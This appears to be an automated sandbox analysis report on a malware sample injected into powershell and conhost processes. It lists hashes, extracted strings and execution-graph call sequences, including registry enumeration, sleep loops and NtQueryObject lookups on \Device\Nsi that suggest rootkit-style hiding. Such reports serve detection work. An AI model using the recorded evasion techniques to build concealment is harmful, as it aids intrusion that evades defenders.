                                                  • API String ID:
                                                  • Opcode ID: f005966cfda3b710235f48e4aead457a958ed6aa6ddd462c76b7ecd106481a73
                                                  • Instruction ID: edab99c737359d944d09ed3d2787f1ebb13ae286ca2b0f07855c4ed98a2b4067
                                                  • Opcode Fuzzy Hash: f005966cfda3b710235f48e4aead457a958ed6aa6ddd462c76b7ecd106481a73
                                                  • Instruction Fuzzy Hash: 39D0673190510D8BCF08ABA4E85B4FEBB74FA14702F40456AE90793591EA352A5ACEC1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29acbc0c0e6c916e71dcd6bd289f22a81a165021d3225b539418ccbeedbe33cc
                                                  • Instruction ID: f27d76ece691e50eb169d260745a2965bdb805b2ee1f7338104774ca708a8cdc
                                                  • Opcode Fuzzy Hash: 29acbc0c0e6c916e71dcd6bd289f22a81a165021d3225b539418ccbeedbe33cc
                                                  • Instruction Fuzzy Hash: 0BD01234A042098BCB18EF64E8464ADBFB4AB44705F004155D90593350EA305841CBC5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8955ad6e72a04f9e7583e459258af33a8dd7bc4432683953c9c8d7f41fa8f1e8
                                                  • Instruction ID: aeff0bf874f406e0c09d8c74b45c1d7ec9eb1244fde97182f22b01206cc5ab15
                                                  • Opcode Fuzzy Hash: 8955ad6e72a04f9e7583e459258af33a8dd7bc4432683953c9c8d7f41fa8f1e8
                                                  • Instruction Fuzzy Hash: A2C04C341443098FC6156F759545938B32DBE4460A754089AE80A06266AF36E951DE44
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba5e0650db01396ed362e83ecca71769fde1b0825f1a8ae385cd11d8f5f4c9a6
                                                  • Instruction ID: 4c3625edc6485c85da1bc34997ea599dc08e6b11057b06baac199d4b6f8e888e
                                                  • Opcode Fuzzy Hash: ba5e0650db01396ed362e83ecca71769fde1b0825f1a8ae385cd11d8f5f4c9a6
                                                  • Instruction Fuzzy Hash: 56B0923404430D8FC2186F75A906878772DBE4060578408A9F40A0BBA68E3BE880CA95
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b597753f9dca4cd99c86abe9890cf86f7d2fec0a57e1ead637af7c7160f41c7
                                                  • Instruction ID: 21d8b6a08eef3a44e9942ee3dd451c4007d245d0899c1c502a5ad5c4edd074af
                                                  • Opcode Fuzzy Hash: 4b597753f9dca4cd99c86abe9890cf86f7d2fec0a57e1ead637af7c7160f41c7
                                                  • Instruction Fuzzy Hash: EDB0923004430D8FC2086F75A905828732DBE4060578408A8E40A0B3A68E3BE840CA44
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8af8fc38d1b8914917754b24cbe39bda6276537dfcfdeede8f803ba63ae1dbc8
                                                  • Instruction ID: 739042a2c3197e89e7d4be4cef98e21f949024b001af59ff94cb4638fc2e4de6
                                                  • Opcode Fuzzy Hash: 8af8fc38d1b8914917754b24cbe39bda6276537dfcfdeede8f803ba63ae1dbc8
                                                  • Instruction Fuzzy Hash: FEB0123260811187EF0C8B3055480757332B79D602321D0979003C0000CE3004439D04
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07f5caf383d67dca14f64d5d8d0841a43a4c0a2ec1f52f89240fdb9a9b926b2d
                                                  • Instruction ID: f50b76cae5fadfd396d351e5bb56a95e9301190852b03669e57f9a6bd7c607bd
                                                  • Opcode Fuzzy Hash: 07f5caf383d67dca14f64d5d8d0841a43a4c0a2ec1f52f89240fdb9a9b926b2d
                                                  • Instruction Fuzzy Hash: ECA0023EA1811157BF4DDA3556595EA27735BC2202314C4AA9103C0444CD3548429948
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2244628161.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8150000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xgn^
                                                  • API String ID: 0-1038256505
                                                  • Opcode ID: 73112f1705cb11d76182b8ff6b19979af15234517e066f5f567c66df61c45cba
                                                  • Instruction ID: 46d6bb7a45385d200536a0402a00f4416d489b0ceea27893b62106bb05c8c116
                                                  • Opcode Fuzzy Hash: 73112f1705cb11d76182b8ff6b19979af15234517e066f5f567c66df61c45cba
                                                  • Instruction Fuzzy Hash: 04E15EB0700205DFEB18DF29C844BAABBF1FF44705F10856DD816DB2A1EB76E9468B90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $c1k$4'jq$4'jq$4'jq$4'jq$84<l$84<l$tPjq$tPjq$J?l$J?l$J?l$J?l$J?l$r>l$r>l
                                                  • API String ID: 0-1020440608
                                                  • Opcode ID: dab4e184ab2c85f442c4468994b0b03215b6392b60dbe80bcba368c56c33ca06
                                                  • Instruction ID: 60dfe8ca9a03798d8ab08412522c687876d5f78fc07936b64e2b388a063f1d16
                                                  • Opcode Fuzzy Hash: dab4e184ab2c85f442c4468994b0b03215b6392b60dbe80bcba368c56c33ca06
                                                  • Instruction Fuzzy Hash: 26D15735F042058FCB64CB6A94106ABBFAAAFC5310B1884BBD915CB295DB35CD46C7E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$tPjq$tPjq$#.k$$jq$$jq$$jq$4l$4l
                                                  • API String ID: 0-1274348444
                                                  • Opcode ID: 895e654ec4f7fd671fc545ecb9e83b1d3bbdc89611ef287eea84707c0ce1bd91
                                                  • Instruction ID: ff7d92605c5e213fbe33f75e3f5fe813b917a2eb3a89c4261d34a4fdeef53529
                                                  • Opcode Fuzzy Hash: 895e654ec4f7fd671fc545ecb9e83b1d3bbdc89611ef287eea84707c0ce1bd91
                                                  • Instruction Fuzzy Hash: 05816736F042158FD7648B6DC85067ABFAAEFC5220B1484ABD941CB291EA35CE41C7A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$$jq$$jq$$jq$4l$4l
                                                  • API String ID: 0-1950125027
                                                  • Opcode ID: 7ea259db35145be6ffe9cba8bb7bf365ab207d5709f444e17c0fa997848539af
                                                  • Instruction ID: 3d70cb4b8abcaff3967e5895041fe19ae71ed707482e95b8a48f0ac31b1c8d0d
                                                  • Opcode Fuzzy Hash: 7ea259db35145be6ffe9cba8bb7bf365ab207d5709f444e17c0fa997848539af
                                                  • Instruction Fuzzy Hash: 89516A37F08305DFDB645A69881867BBFB6EFC5211F14807BD845CB291DA31C945CBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tM>l$`kq$`kq$`kq$`kq
                                                  • API String ID: 0-238216489
                                                  • Opcode ID: 5605fb3f724cc1a5144fc1e2f6eafde85672683018ec0463e92a6370bf916e17
                                                  • Instruction ID: b0c05213f94b92cfba2a5f7526f3ffa02794a9f74f17b8fcb122d5d0d6022f51
                                                  • Opcode Fuzzy Hash: 5605fb3f724cc1a5144fc1e2f6eafde85672683018ec0463e92a6370bf916e17
                                                  • Instruction Fuzzy Hash: C2B1A674E002099FDB54DFA9D980A9EFBF6FF48314F10862AD419AB355EB34A905CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tM>l$`kq$`kq$`kq$`kq
                                                  • API String ID: 0-238216489
                                                  • Opcode ID: 2f2d128c7749004c77c9c7ae39d0c13e7922b498e082a7ee794bdd51191fb4a0
                                                  • Instruction ID: 9ed2012c97044bc3c4c842dbcfc5a1e5b52400bf469186582a5f80320241810f
                                                  • Opcode Fuzzy Hash: 2f2d128c7749004c77c9c7ae39d0c13e7922b498e082a7ee794bdd51191fb4a0
                                                  • Instruction Fuzzy Hash: 87B19574E002099FDB54DFA9D980A9EFBF6FF48314F10862AD419AB355EB34A905CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $jq$$jq$$jq$$jq
                                                  • API String ID: 0-2428501249
                                                  • Opcode ID: 39450fd458d8faedff91cf936256781dc5e8966c6fe49ee6d2a4b9700ed594eb
                                                  • Instruction ID: 1bdeaad28a724d301f9e37e9a2bfcd2b918b3a96b43b4e16dd43e7a245af9ef5
                                                  • Opcode Fuzzy Hash: 39450fd458d8faedff91cf936256781dc5e8966c6fe49ee6d2a4b9700ed594eb
                                                  • Instruction Fuzzy Hash: 35213732F182049FEBA4596A8840727BFD7ABC1719F24842AD905CB281DD77C941C361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $jq$$jq$J?l$J?l
                                                  • API String ID: 0-1718209251
                                                  • Opcode ID: 4f6133fa23d6e069eebe0f9baf25006f8014c6199d4fbc0aba26e02ba2080f79
                                                  • Instruction ID: b651465812121d0c646adf386287c630e5e502e82aa5cd087d53f8527d5f7386
                                                  • Opcode Fuzzy Hash: 4f6133fa23d6e069eebe0f9baf25006f8014c6199d4fbc0aba26e02ba2080f79
                                                  • Instruction Fuzzy Hash: DF014726E0E3804FC32202580C115933FBEDFC2510B1A45D7D990AB267D82E8E06C3A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$$jq$$jq
                                                  • API String ID: 0-1496060811
                                                  • Opcode ID: e9bbad06d4d3df71e8eff6605e1bdd11a5a1d69ab0152d1d98287a1b7bc07838
                                                  • Instruction ID: 1670a801d55517cd999b19263547db6bb9a528b2a3a7ed9ad8ae78169f1201bd
                                                  • Opcode Fuzzy Hash: e9bbad06d4d3df71e8eff6605e1bdd11a5a1d69ab0152d1d98287a1b7bc07838
                                                  • Instruction Fuzzy Hash: 66012621B4D3954FD36A022818316AAAFB79FC3510B2A40EBC881DF393CD684D15C7AB

                                                  Execution Graph

                                                  Execution Coverage:0.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:81
                                                  Total number of Limit Nodes:2
                                                  execution_graph 14877 19a49801abc 14883 19a49801628 GetProcessHeap 14877->14883 14879 19a49801ad2 Sleep SleepEx 14881 19a49801acb 14879->14881 14881->14879 14882 19a49801598 StrCmpIW StrCmpW 14881->14882 14928 19a498018b4 14881->14928 14882->14881 14884 19a49801648 __free_lconv_mon 14883->14884 14945 19a49801268 GetProcessHeap 14884->14945 14886 19a49801650 14887 19a49801268 2 API calls 14886->14887 14888 19a49801661 14887->14888 14889 19a49801268 2 API calls 14888->14889 14890 19a4980166a 14889->14890 14891 19a49801268 2 API calls 14890->14891 14892 19a49801673 14891->14892 14893 19a4980168e RegOpenKeyExW 14892->14893 14894 19a498016c0 RegOpenKeyExW 14893->14894 14895 19a498018a6 14893->14895 14896 19a498016ff RegOpenKeyExW 14894->14896 14897 19a498016e9 14894->14897 14895->14881 14899 19a4980173a RegOpenKeyExW 14896->14899 14900 19a49801723 14896->14900 14949 19a498012bc RegQueryInfoKeyW 14897->14949 14901 19a4980175e 14899->14901 14902 19a49801775 RegOpenKeyExW 14899->14902 14960 19a4980104c RegQueryInfoKeyW 14900->14960 14906 19a498012bc 11 API calls 14901->14906 14907 19a498017b0 RegOpenKeyExW 14902->14907 14908 19a49801799 14902->14908 14903 19a498016f5 RegCloseKey 14903->14896 14909 19a4980176b RegCloseKey 14906->14909 14911 19a498017eb RegOpenKeyExW 14907->14911 14912 19a498017d4 14907->14912 14910 19a498012bc 11 API calls 14908->14910 14909->14902 14913 19a498017a6 RegCloseKey 14910->14913 14915 19a4980180f 14911->14915 14916 19a49801826 RegOpenKeyExW 14911->14916 14914 19a498012bc 11 API calls 14912->14914 14913->14907 14919 19a498017e1 RegCloseKey 14914->14919 14920 19a4980104c 4 API calls 14915->14920 14917 19a4980184a 14916->14917 14918 19a49801861 RegOpenKeyExW 14916->14918 14922 19a4980104c 4 API calls 14917->14922 14923 19a4980189c RegCloseKey 14918->14923 14924 19a49801885 14918->14924 14919->14911 14921 19a4980181c RegCloseKey 14920->14921 14921->14916 14925 19a49801857 RegCloseKey 14922->14925 14923->14895 14926 19a4980104c 4 API calls 14924->14926 14925->14918 14927 19a49801892 RegCloseKey 14926->14927 14927->14923 14972 19a498014a4 14928->14972 14966 19a49816168 14945->14966 14947 19a49801283 GetProcessHeap 14948 19a498012ae __free_lconv_mon 14947->14948 14948->14886 14950 19a4980148a __free_lconv_mon 14949->14950 14951 19a49801327 GetProcessHeap 14949->14951 14950->14903 14954 19a4980133e __free_lconv_mon 14951->14954 14952 19a49801352 RegEnumValueW 14952->14954 14953 19a49801476 GetProcessHeap 14953->14950 14954->14952 14954->14953 14956 19a4980141e lstrlenW GetProcessHeap 14954->14956 14957 19a498013d3 GetProcessHeap 14954->14957 14958 19a498013f3 GetProcessHeap 14954->14958 14959 19a49801443 StrCpyW 14954->14959 14967 19a4980152c 14954->14967 14956->14954 14957->14954 14958->14954 14959->14954 14961 19a498010bf __free_lconv_mon 14960->14961 14962 19a498011b5 RegCloseKey 14960->14962 14961->14962 14963 19a498010cf RegEnumValueW 14961->14963 14964 19a4980114e GetProcessHeap 14961->14964 14965 19a4980116e GetProcessHeap 14961->14965 14962->14899 14963->14961 14964->14961 14965->14961 14968 19a4980157c 14967->14968 14969 19a49801546 14967->14969 14968->14954 14969->14968 14970 19a4980155d StrCmpIW 14969->14970 14971 19a49801565 StrCmpW 14969->14971 14970->14969 14971->14969 14973 19a498014e1 GetProcessHeap 14972->14973 14974 19a498014c1 GetProcessHeap 14972->14974 14978 19a49816180 14973->14978 14975 19a498014da __free_lconv_mon 14974->14975 14975->14973 14975->14974 14979 19a49816182 14978->14979 14980 19a497d273c 14982 19a497d276a 14980->14982 14981 19a497d2858 LoadLibraryA 14981->14982 14982->14981 14983 19a497d28d4 14982->14983

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction ID: dde57f2258e09cee01642a887e0e5d641ef90779c87b0062cd588f70ff96c3bb
                                                  • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction Fuzzy Hash: 7011A13061020282F7649B29F8B57D92294BFD4F44FCE412A994683591EFF8C07C83C3

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0000019A49801628: GetProcessHeap.KERNEL32 ref: 0000019A49801633
                                                    • Part of subcall function 0000019A49801628: HeapAlloc.KERNEL32 ref: 0000019A49801642
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A498016B2
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A498016DF
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498016F9
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801719
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A49801734
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801754
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A4980176F
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A4980178F
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498017AA
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A498017CA
                                                  • Sleep.KERNEL32 ref: 0000019A49801AD7
                                                  • SleepEx.KERNELBASE ref: 0000019A49801ADD
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498017E5
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801805
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A49801820
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801840
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A4980185B
                                                    • Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A4980187B
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A49801896
                                                    • Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498018A0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$HeapSleep$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1534210851-0
                                                  • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction ID: b600031d3329a55e4df002e5a073c9957e2814a8dd9cbce4073cf2a61d3f919c
                                                  • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction Fuzzy Hash: E931303120160155FF509F2EDA717E913A4AFC4FE0F8D54219E0987295EF94C879C393

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction ID: ffd38c940bb3e8c7b7636590f0ed4d1b8b1c68e097bce8cb2b2aeb7eeb9278c0
                                                  • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction Fuzzy Hash: 8F610132B0169087EB548F1590607ADB3A2FB94FA4F9C8221DF5D27788DA78D877C781

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 365 19a49802b2c-19a49802ba5 call 19a49822ce0 368 19a49802bab-19a49802bb1 365->368 369 19a49802ee0-19a49802f03 365->369 368->369 370 19a49802bb7-19a49802bba 368->370 370->369 371 19a49802bc0-19a49802bc3 370->371 371->369 372 19a49802bc9-19a49802bd9 GetModuleHandleA 371->372 373 19a49802bdb-19a49802beb call 19a49816090 372->373 374 19a49802bed 372->374 376 19a49802bf0-19a49802c0e 373->376 374->376 376->369 379 19a49802c14-19a49802c33 StrCmpNIW 376->379 379->369 380 19a49802c39-19a49802c3d 379->380 380->369 381 19a49802c43-19a49802c4d 380->381 381->369 382 19a49802c53-19a49802c5a 381->382 382->369 383 19a49802c60-19a49802c73 382->383 384 19a49802c83 383->384 385 19a49802c75-19a49802c81 383->385 386 19a49802c86-19a49802c8a 384->386 385->386 387 19a49802c9a 386->387 388 19a49802c8c-19a49802c98 386->388 389 19a49802c9d-19a49802ca7 387->389 388->389 390 19a49802d9d-19a49802da1 389->390 391 19a49802cad-19a49802cb0 389->391 392 19a49802ed2-19a49802eda 390->392 393 19a49802da7-19a49802daa 390->393 394 19a49802cc2-19a49802ccc 391->394 395 19a49802cb2-19a49802cbf call 19a4980199c 391->395 392->369 392->383 396 19a49802dbb-19a49802dc5 393->396 397 19a49802dac-19a49802db8 call 19a4980199c 393->397 399 19a49802cce-19a49802cdb 394->399 400 19a49802d00-19a49802d0a 394->400 395->394 404 19a49802df5-19a49802df8 396->404 405 19a49802dc7-19a49802dd4 396->405 397->396 399->400 407 19a49802cdd-19a49802cea 399->407 401 19a49802d3a-19a49802d3d 400->401 402 19a49802d0c-19a49802d19 400->402 410 19a49802d4b-19a49802d58 lstrlenW 401->410 411 19a49802d3f-19a49802d49 call 19a49801bbc 401->411 402->401 409 19a49802d1b-19a49802d28 402->409 414 19a49802dfa-19a49802e03 call 19a49801bbc 404->414 415 19a49802e05-19a49802e12 lstrlenW 404->415 405->404 413 19a49802dd6-19a49802de3 405->413 408 19a49802ced-19a49802cf3 407->408 417 19a49802d93-19a49802d98 408->417 418 19a49802cf9-19a49802cfe 408->418 421 19a49802d2b-19a49802d31 409->421 423 19a49802d5a-19a49802d64 410->423 424 19a49802d7b-19a49802d8d call 19a49803844 410->424 411->410 411->417 425 19a49802de6-19a49802dec 413->425 414->415 434 19a49802e4a-19a49802e55 414->434 419 19a49802e14-19a49802e1e 415->419 420 19a49802e35-19a49802e3f call 19a49803844 415->420 428 19a49802e42-19a49802e44 417->428 418->400 418->408 419->420 429 19a49802e20-19a49802e33 call 19a4980152c 419->429 420->428 421->417 430 19a49802d33-19a49802d38 421->430 423->424 433 19a49802d66-19a49802d79 call 19a4980152c 423->433 424->417 424->428 425->434 435 19a49802dee-19a49802df3 425->435 428->392 428->434 429->420 429->434 430->401 430->421 433->417 433->424 439 19a49802ecc-19a49802ed0 434->439 440 19a49802e57-19a49802e5b 434->440 435->404 435->425 439->392 443 19a49802e5d-19a49802e61 440->443 444 19a49802e63-19a49802e7d call 19a498085c0 440->444 443->444 446 19a49802e80-19a49802e83 443->446 444->446 449 19a49802e85-19a49802ea3 call 19a498085c0 446->449 450 19a49802ea6-19a49802ea9 446->450 449->450 450->439 452 19a49802eab-19a49802ec9 call 19a498085c0 450->452 452->439
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                  • Instruction ID: 214dbd209c19ea4beb045b5d8d128529ff69c00b1d6f2a27e0d487b295368070
                                                  • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                  • Instruction Fuzzy Hash: 92B19B32210A5486EB688F29D4607E967A4FF84F94F8A5016EE4953795DBF4CCA8C3C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction ID: 7e9eb21ec22594ff17cbccae9e2aac58471280ecdde8af57f0b49c4fd349ee9d
                                                  • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction Fuzzy Hash: D5316172205B8489EB609F64E8503ED7360FBC4B44F884029DB8D47B98EF78C95CC752
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction ID: 31f64e0c1fbe57bf9b5fcf7e919071de1fb5ed6862fe9d7a7163a1350efb7bbb
                                                  • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction Fuzzy Hash: 92318832214F8085DB60CF29E8513DE73A4FBC9B54F950129EA9D43B54DF78C569CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction ID: ab9ce0ad891cf8bc81c54c6378d507aa36de6b2658ada06a3047d4a52364b745
